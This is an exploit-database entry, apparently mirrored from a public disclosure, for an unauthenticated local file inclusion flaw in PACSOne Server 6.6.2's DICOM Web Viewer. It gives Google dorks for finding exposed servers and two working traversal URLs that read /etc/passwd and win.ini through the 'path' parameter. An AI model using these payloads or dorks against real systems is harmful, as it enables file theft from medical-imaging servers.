[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PACSOne Server 6.6.2 DICOM Web Viewer - Directory Trasversal Vulnerability

Author
Carlos Avila
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-29651
Category
web applications
Date add
28-01-2018
Platform
php
# Exploit Title: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal / Local File Inclusion
# Software Link: http://www.pacsone.net/download.htm
# Google Dork: inurl:pacs/login.php inurl:pacsone/login.php     inurl:pacsone filetype:php home     inurl:pacsone filetype:php login
# Version: PACSOne Server 6.6.2
# Category: webapps
# Tested on: Windows 7 / Debian Linux
# Exploit Author: Carlos Avila
# Contact: http://twitter.com/badboy_nt
 
 
 
1. Description
   
DICOM Web Viewer is a component written in PHP that is part of PacsOne software. In version 6.6.2, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials aren't required.
The 'path' parameter via GET is vulnerable.
 
Found: 08/14/2017
Vendor Reply & Fix: 09/28/2017
 
   
2. Proof of Concept
 
 
http://localhost/pacs/nocache.php?path=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
 
http://localhost/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd
 
 
3. Solution:
 
Application inputs must be validated correctly.

#  0day.today [2024-11-15]  #